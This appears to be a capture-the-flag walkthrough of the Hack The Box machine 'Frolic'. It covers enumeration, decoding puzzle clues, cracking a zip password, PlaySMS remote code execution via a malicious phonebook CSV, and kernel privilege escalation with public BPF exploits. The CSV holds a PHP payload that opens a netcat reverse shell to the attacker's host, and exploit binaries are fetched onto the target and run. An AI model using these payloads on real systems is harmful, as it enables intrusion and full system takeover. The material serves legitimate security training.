Frolic
Ports scan
u505@kali:~/HTB/Machines/Frolic# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.111 --rate=1000
Starting masscan 1.0.5 at 2020-01-26 02:29:50 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 139/tcp on 10.10.10.111
Discovered open port 22/tcp on 10.10.10.111
Discovered open port 445/tcp on 10.10.10.111
Discovered open port 1880/tcp on 10.10.10.111
Discovered open port 9999/tcp on 10.10.10.111
Discovered open port 137/udp on 10.10.10.111
u505@kali:~/HTB/Machines/Frolic# nmap -sC -sV 10.10.10.111
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-25 21:30 EST
Nmap scan report for frolic.htb (10.10.10.111)
Host is up (0.047s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
|   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
9999/tcp open  http        nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h49m54s, deviation: 3h10m30s, median: 4s
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: frolic
|   NetBIOS computer name: FROLIC\x00
|   Domain name: \x00
|   FQDN: frolic
|_  System time: 2020-01-26T08:00:43+05:30
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-01-26T02:30:43
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.34 seconds
Rerun of nmap against the ports discovered by masscan, including the ones the default top-1000 scan missed (1880/tcp and 137/udp):
u505@kali:~/HTB/Machines/Frolic# nmap -sC -sV -p 22,137,139,445,1880,9999 10.10.10.111
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-25 21:33 EST
Nmap scan report for frolic.htb (10.10.10.111)
Host is up (0.14s latency).

PORT     STATE  SERVICE     VERSION
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
|   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
137/tcp  closed netbios-ns
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open   netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1880/tcp open   http        Node.js (Express middleware)
|_http-title: Node-RED
9999/tcp open   http        nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h49m54s, deviation: 3h10m30s, median: 4s
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: frolic
|   NetBIOS computer name: FROLIC\x00
|   Domain name: \x00
|   FQDN: frolic
|_  System time: 2020-01-26T08:04:02+05:30
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-01-26T02:34:02
|_  start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.63 seconds
Port 1880
Web enumeration
u505@kali:~/HTB/Machines/Frolic$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "js,txt" -f -t 1000 -u http://10.10.10.111:1880
Extensions: js, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562
Error Log: /opt/utils/dirsearch/logs/errors-20-02-12_10-03-30.log
Target: http://10.10.10.111:1880
[10:03:30] Starting:
[10:03:32] 401 -   12B  - /icons/
[10:03:49] 401 -   12B  - /settings/
[10:03:56] 401 -   12B  - /Icons/
[10:05:31] 401 -   12B  - /nodes/
[10:08:25] 401 -   12B  - /SETTINGS/
[10:09:06] 401 -   12B  - /flows/
[10:22:16] 401 -   12B  - /ICONS/
Task Completed
Some paths exist, but every one of them answers 401, so nothing is reachable without credentials.
Node-RED RCE
I found an article about an RCE on the product Node-RED (https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/).
A quick check shows that this instance requires authentication (the API answers 401 with a Bearer challenge):
u505@kali:~/HTB/Machines/Frolic$ curl -i http://10.10.10.111:1880/settings
HTTP/1.1 401 Unauthorized
X-Powered-By: Express
WWW-Authenticate: Bearer realm="Users"
Date: Wed, 12 Feb 2020 15:11:14 GMT
Connection: keep-alive
Content-Length: 12

Unauthorized
I downloaded the script anyway.
u505@kali:~/HTB/Machines/Frolic$ wget -q https://gist.githubusercontent.com/QKaiser/79459c3cb5ea6e658701c7d203a8c297/raw/8966e4ee07400f16b92737161ca8df3cbfa37f91/noderedsh.py
The script gets stuck because we need valid credentials
u505@kali:~/HTB/Machines/Frolic$ ./noderedsh.py http://10.10.10.111:1880
[+] Node-RED requires authentication.
[+] Trying default credentials.
Port 9999
Port 9999 serves what looks like a default nginx installation ("Welcome to nginx!").
dirsearch
The first dirsearch run detected some folders.
u505@kali:~/HTB/Machines/Frolic$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "js,txt" -f -t 1000 -u http://10.10.10.111:9999
Extensions: js, txt | HTTP method: get | Threads: 1000 | Wordlist size: 661562
Error Log: /opt/utils/dirsearch/logs/errors-20-02-12_13-39-29.log
Target: http://10.10.10.111:9999
[13:39:29] Starting:
[13:39:32] 200 -  634B  - /admin/
[13:39:35] 200 -   83KB - /test/
[13:39:37] 403 -  580B  - /dev/
[13:39:43] 200 -   28B  - /backup/
[13:41:04] 403 -  580B  - /loop/
CTRL+C detected: Pausing threads, please wait...
Canceled by the user
I ran a second one, recursive with 3 levels and a smaller dictionary (I removed the .ht* entries from the wordlist).
u505@kali:~/HTB/Machines/Frolic$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -r -R 3 -e "php,js,txt,html,css,png" -f -t 1000 -u http://10.10.10.111:9999
Extensions: php, js, txt, html, css, png | HTTP method: get | Threads: 1000 | Wordlist size: 32283 | Recursion level: 3
Error Log: /opt/utils/dirsearch/logs/errors-20-02-12_13-59-20.log
Target: http://10.10.10.111:9999
[13:59:20] Starting:
[13:59:27] 200 -  634B  - /admin/
[13:59:31] 200 -   28B  - /backup/
[13:59:44] 403 -  580B  - /dev/
[14:00:37] 200 -   83KB - /test/
[14:00:46] Starting: admin/
[14:01:11] 403 -  580B  - /admin/css/
[14:01:29] 200 -  634B  - /admin/index.html
[14:01:32] 403 -  580B  - /admin/js/
[14:02:08] 200 -    1KB - /admin/success.html
[14:02:20] Starting: backup/
[14:03:06] 200 -   28B  - /backup/index.php
[14:03:22] 200 -   22B  - /backup/password.txt
[14:03:48] 200 -   13B  - /backup/user.txt
[14:03:53] Starting: dev/
[14:04:03] 200 -   11B  - /dev/backup/
[14:05:16] Starting: test/
[14:05:56] 200 -   83KB - /test/index.php
[14:06:46] Starting: admin/css/
[14:08:05] 200 -    1KB - /admin/css/style.css
[14:08:15] Starting: admin/js/
[14:09:07] 200 -  752B  - /admin/js/login.js
[14:09:46] Starting: dev/backup/
[14:10:28] 200 -   11B  - /dev/backup/index.php
Task Completed
Folder admin
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/admin/
<html>
<head>
<title>Crack me :|</title>
<!-- Include CSS File Here -->
<link rel="stylesheet" href="css/style.css"/>
<!-- Include JS File Here -->
<script src="js/login.js"></script>
</head>
<body>
<div class="container">
<div class="main">
<h2>c'mon i m hackable</h2>
<form id="form_id" method="post" name="myform">
<label>User Name :</label>
<input type="text" name="username" id="username"/>
<label>Password :</label>
<input type="password" name="password" id="password"/>
<input type="button" value="Login" id="submit" onclick="validate()"/>
</form>
<span><b class="note">Note : Nothing</b></span>
</div>
</div>
</body>
</html>
The page is static: a username/password form whose Login button calls validate() from /admin/js/login.js instead of submitting anything to the server.
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/admin/js/login.js
var attempt = 3; // Variable to count number of attempts.
// Below function Executes on click of login button.
function validate(){
  var username = document.getElementById("username").value;
  var password = document.getElementById("password").value;
  if ( username == "admin" && password == "superduperlooperpassword_lol"){
    alert ("Login successfully");
    window.location = "success.html"; // Redirecting to other page.
    return false;
  }
  else{
    attempt --;// Decrementing by one.
    alert("You have left "+attempt+" attempt;");
    // Disabling fields after 3 attempts.
    if( attempt == 0){
      document.getElementById("username").disabled = true;
      document.getElementById("password").disabled = true;
      document.getElementById("submit").disabled = true;
      return false;
    }
  }
}
The login.js script has the credentials hard-coded and the whole check runs client-side; on success it simply redirects to success.html, which can be requested directly.
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/admin/success.html ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?.
The success page is a little cryptic. It is Ook! (https://esolangs.org/wiki/Ook!), a rewriting of Brainfuck, an already obfuscated esoteric programming language, designed to be writable and readable by orang-utans (which communicate by saying "ook, ook"), a nod to the Librarian of Terry Pratchett's Discworld (https://en.wikipedia.org/wiki/Unseen_University#Librarian).
The website https://www.dcode.fr/ook-language decodes the text to:
Nothing here check /asdiSIAJJ0QWE9JAS
Fetching that path returns base64 text.
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/
UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB
BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs
K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve
EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj
lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC
AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG
AAAAAAEAAQBPAAAAAwEAAAAA
u505@kali:~/HTB/Machines/Frolic$ wget -q http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/
We decode the base64 (the leading "UEsDBB" is the base64 form of the zip magic PK\x03\x04, a hint of what comes next); wget saved the directory URL as index.html.
u505@kali:~/HTB/Machines/Frolic$ cat index.html | base64 -d > index.dec
u505@kali:~/HTB/Machines/Frolic$ file index.dec
index.dec: Zip archive data, at least v2.0 to extract
The file seems to be a zip file.
u505@kali:~/HTB/Machines/Frolic$ cp index.dec index.zip
u505@kali:~/HTB/Machines/Frolic$ unzip index.zip
Archive: index.zip
[index.zip] index.php password:
skipping: index.php incorrect password
The zip file is password protected, so we brute-force it: zip2john extracts the hash and john runs rockyou against it.
u505@kali:~/HTB/Machines/Frolic$ zip2john index.zip > index.zip.john
ver 2.0 efh 5455 efh 7875 index.zip/index.php PKZIP Encr: 2b chk, TS_chk, cmplen=176, decmplen=617, crc=145BFE23
u505@kali:~/HTB/Machines/Frolic$ john -w=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt index.zip.john
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
password (index.zip/index.php)
1g 0:00:00:00 DONE (2020-02-12 15:08) 100.0g/s 1638Kp/s 1638Kc/s 1638KC/s 123456..christal
Use the "--show" option to display all of the cracked passwords reliably
Session completed
The password is found nearly instantly: it is "password".
u505@kali:~/HTB/Machines/Frolic$ unzip index.zip
Archive:  index.zip
[index.zip] index.php password:
  inflating: index.php
u505@kali:~/HTB/Machines/Frolic$ cat index.php
[long hexadecimal string, omitted]
The extracted index.php is one long string of hexadecimal digits, so we turn it back into bytes with xxd.
u505@kali:~/HTB/Machines/Frolic$ cat index.php | xxd -r -p > index.hex
u505@kali:~/HTB/Machines/Frolic$ cat index.hex
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==
The result is base64 again. The carriage returns have to be stripped first, otherwise base64 -d rejects the input as invalid.
u505@kali:~/HTB/Machines/Frolic$ tr -d '\r' <index.hex | base64 -d
+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+ ++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->--- <]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..<
This is Brainfuck, so we go back to dcode.fr to run it.
At the end of this trail of breadcrumbs we finally have something that looks like a password:
idkwhatispass
Folder backup
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/backup/
password.txt
user.txt
loop/
The file user.txt contains a username, admin:
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/backup/user.txt
user - admin
And the file password.txt contains a password:
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/backup/password.txt
password - imnothuman
Folder test
The folder test serves a phpinfo() page.
One useful piece of information in it is that the server seems to have a MySQL database behind its PHP applications.
Folder /dev/backup
u505@kali:~/HTB/Machines/Frolic$ curl http://10.10.10.111:9999/dev/backup/
/playsms
This page gives us another clue: a /playsms path.
We can log in to that application with the user admin and the password idkwhatispass found previously (the imnothuman password from /backup does not work there).
Exploit playsms
PlaySMS is a free and open source SMS gateway software (see https://playsms.org/).
search exploit
u505@kali:~/HTB/Machines/Frolic$ searchsploit playsms
----------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
----------------------------------------------------- ----------------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Uplo | exploits/php/remote/44598.rb
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execut | exploits/php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution | exploits/php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authentic | exploits/php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution | exploits/php/webapps/42038.txt
PlaySms 0.7 - SQL Injection | exploits/linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting | exploits/php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusion | exploits/php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion | exploits/php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery | exploits/php/webapps/30177.txt
----------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
This video illustrates exploit 42044: https://www.youtube.com/watch?v=KIB9sKQdEwE
CVE-2017-9101
Exploit 42044 from exploit-db (https://www.exploit-db.com/exploits/42044) corresponds to CVE-2017-9101 (https://nvd.nist.gov/vuln/detail/CVE-2017-9101): by importing a malicious phonebook CSV, PHP code placed in the fields gets executed. A first, harmless CSV to confirm it:
u505@kali:~/HTB/Machines/Frolic$ cat badphonebook.csv
Name, Mobile, Email, Group code, Tags
<?php system("hostname") ?>,+1234,<?php system("whoami") ?>,1,1
After the import, the first field has been executed and the page displays the hostname.
Our next malicious CSV opens a reverse shell instead:
u505@kali:~/HTB/Machines/Frolic$ cat badphonebook2.csv
Name, Mobile, Email, Group code, Tags
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.26 4444 >/tmp/f"); echo "Thank you." ?>,+1234,email,1,1
We start the listener before importing it.
u505@kali:~/HTB/Machines/Frolic$ rlwrap nc -lvnp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.111.
Ncat: Connection from 10.10.10.111:59548.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@frolic:~/html/playsms$ <CTRL-Z>
u505@kali:~/HTB/Machines/Frolic$ stty -a
speed 38400 baud; rows 24; columns 94; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc
u505@kali:~/HTB/Machines/Frolic$ stty raw -echo
fg
www-data@frolic:~/html/playsms$ export TERM=screen
www-data@frolic:~/html/playsms$ stty rows 24 columns 94
User Flag
www-data@frolic:~$ cd /home
www-data@frolic:/home$ ls -l
total 8
drwxr-xr-x 3 ayush ayush 4096 Sep 25  2018 ayush
drwxr-xr-x 7 sahay sahay 4096 Sep 25  2018 sahay
www-data@frolic:/home$ cd ayush
www-data@frolic:/home/ayush$ cat user.txt
<USER_FLAG>
Escalation of privileges
Enumeration
u505@kali:~/HTB/Machines/Frolic$ mkdir www
u505@kali:~/HTB/Machines/Frolic/www$ cp /opt/utils/pspy/pspy32 ./
u505@kali:~/HTB/Machines/Frolic/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/Frolic/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
From the target
www-data@frolic:~$ cd /tmp
www-data@frolic:/tmp$ wget -q http://10.10.14.26/pspy32
www-data@frolic:/tmp$ wget -q http://10.10.14.26/LinEnum.sh
www-data@frolic:/tmp$ chmod +x pspy32 LinEnum.sh
www-data@frolic:/tmp$ ./LinEnum.sh
The kernel information is interesting: version 4.4.0-116 is vulnerable to a known local privilege escalation (CVE-2017-16995, see below).
[-] Kernel information (continued):
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-023) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:22:43 UTC 2018
In the list of SUID files there is an interesting one.
-rwsr-xr-x 1 root root 7480 Sep 25 2018 /home/ayush/.binary/rop
pspy did not reveal any scheduled task.
The PlaySMS configuration, on the other hand, contains database credentials:
www-data@frolic:~/html/playsms$ cat config.php | grep db
// mysql, mysqli, pgsql, odbc and others supported by PHP PEAR DB
$core_config['db']['type'] = 'mysqli';      // database engine
$core_config['db']['host'] = 'localhost';   // database host/server
$core_config['db']['port'] = '3306';        // database port
$core_config['db']['user'] = 'root';        // database username
$core_config['db']['pass'] = 'ayush';       // database password
$core_config['db']['name'] = 'playsms';     // database name
// - http://pear.php.net/manual/en/package.database.db.intro-dsn.php
// - http://pear.php.net/manual/en/package.database.db.intro-connect.php
//$core_config['db']['dsn'] = 'mysql://root:password@localhost/playsms';
//$core_config['db']['options'] = $options = array('debug' => 2, 'portability' => DB_PORTABILITY_ALL);
The application connects to MySQL as root with the password ayush (the name of one of the local users), and the password works:
www-data@frolic:~/html/playsms$ mysql -p -u root
Enter password: ayush
But I didn't find anything interesting into the database.
CVE-2017-16995
www-data@frolic:/tmp$ uname -a
Linux frolic 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:22:43 UTC 2018 i686 athlon i686 GNU/Linux
There is an exploit for this kernel
u505@kali:~/HTB/Machines/Frolic/www$ searchsploit 4.4.0-116
----------------------------------------------------- ----------------------------------------
 Exploit Title                                       |  Path
                                                     | (/usr/share/exploitdb/)
----------------------------------------------------- ----------------------------------------
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Pr | exploits/linux/local/44298.c
----------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
Upload exploit
u505@kali:~/HTB/Machines/Frolic/www$ searchsploit -m 44298
  Exploit: Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/44298
     Path: /usr/share/exploitdb/exploits/linux/local/44298.c
File Type: C source, ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Frolic/www/44298.c
u505@kali:~/HTB/Machines/Frolic/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
From the target machine
www-data@frolic:/tmp$ wget -q http://10.10.14.26/44298.c
Compile exploit
www-data@frolic:/tmp$ gcc 44298.c -o 44298
gcc: error trying to exec 'cc1': execvp: No such file or directory
I cannot compile it on the target (gcc is present but the compiler proper, cc1, is missing).
Compile from a 32 bits VM
From a created VM
u505@ubuntu1604432bits:~$ gcc 44298.c -o 44298
u505@ubuntu1604432bits:~$ ./44298
error: bogus fp
u505@ubuntu1604432bits:~$ head 44298.c
/*
 * Ubuntu 16.04.4 kernel priv esc
 *
 * all credits to @bleidl
 * - vnik
// Tested on:
// 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
// if different kernel adjust CRED offset + check kernel stack size
*/
u505@ubuntu1604432bits:~$ uname -a
Linux ubuntu1604432bits 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:22:43 UTC 2018 i686 i686 i686 GNU/Linux
It does not work, and I think it is because some parameters are not correct (the header says it was tested on x86_64, while the VM and the target are i686). I found this PoC for a 32-bit system: Linux Kernel - BPF Sign Extension Local Privilege Escalation. But that one was done on Ubuntu 16.04.3, and the target is 16.04.4.
I download their code.
u505@ubuntu1604432bits:~$ wget https://github.com/LiYangHart/Hacking_Project2/blob/master/upstream44.c
--2020-02-13 11:33:52--  https://github.com/LiYangHart/Hacking_Project2/blob/master/upstream44.c
Resolving github.com (github.com)... 140.82.113.3
Connecting to github.com (github.com)|140.82.113.3|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: 'upstream44.c.1'

upstream44.c.1          [ <=> ]  127.55K   237KB/s    in 0.5s

2020-02-13 11:33:54 (237 KB/s) - 'upstream44.c' saved [130610]
Note that wget on a github.com blob URL saves the HTML page (text/html above); the C source itself has to be fetched from the corresponding raw.githubusercontent.com URL.
It is the same code except for a few #define values:
u505@ubuntu1604432bits:~$ grep "^#define" 44298.c upstream44.c
44298.c:#define PHYS_OFFSET 0xffff880000000000
44298.c:#define CRED_OFFSET 0x5f8
44298.c:#define UID_OFFSET 4
44298.c:#define LOG_BUF_SIZE 65536
44298.c:#define PROGSIZE 328
44298.c:#define __update_elem(a, b, c) \
upstream44.c:#define PHYS_OFFSET 0x00
upstream44.c:#define CRED_OFFSET 0x3f0
upstream44.c:#define UID_OFFSET 4
upstream44.c:#define LOG_BUF_SIZE 65536
upstream44.c:#define PROGSIZE 328
upstream44.c:#define __update_elem(a, b, c) \
I tried with these values
u505@ubuntu1604432bits:~$ gcc upstream44.c -o upstream44
u505@ubuntu1604432bits:~$ ./upstream44
task_struct = 400
Killed
But it still didn't work.
u505@kali:~/HTB/Machines/Frolic$ searchsploit 45010
----------------------------------------------------- ----------------------------------------
 Exploit Title                                       |  Path
                                                     | (/usr/share/exploitdb/)
----------------------------------------------------- ----------------------------------------
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - L | exploits/linux/local/45010.c
----------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
u505@kali:~/HTB/Machines/Frolic$ searchsploit -m 45010
  Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/45010
     Path: /usr/share/exploitdb/exploits/linux/local/45010.c
File Type: C source, ASCII text, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/Frolic/45010.c
Exploit 45010 is very close to this one (it targets the same BPF verifier bug).
u505@ubuntu1604432bits:~$ gcc 45010.c -o 45010
u505@ubuntu1604432bits:~$ ./45010
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
Killed
It doesn't work either.
u505@ubuntu1604432bits:~$ ./upstream44
task_struct = f243d000
uidptr = f6db8e84
spawning root shell
root@ubuntu1604432bits:~# whoami
root
But if upstream44 is run right after 45010 has failed, it works :) and the root shell is spawned.
Run from target
www-data@frolic:/tmp$ wget -q http://10.10.14.26/45010
www-data@frolic:/tmp$ wget -q http://10.10.14.26/upstream44
www-data@frolic:/tmp$ chmod +x 45010 upstream44
www-data@frolic:/tmp$ ./45010
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
Killed
www-data@frolic:/tmp$ ./upstream44
task_struct = f61ee400
uidptr = f1b24084
spawning root shell
root@frolic:/tmp# whoami
root
Alternative way by Buffer overflow
I think, this was the intended way to solve this box.
www-data@frolic:/home/ayush/.binary$ ls -l
total 8
-rwsr-xr-x 1 root root 7480 Sep 25 2018 rop
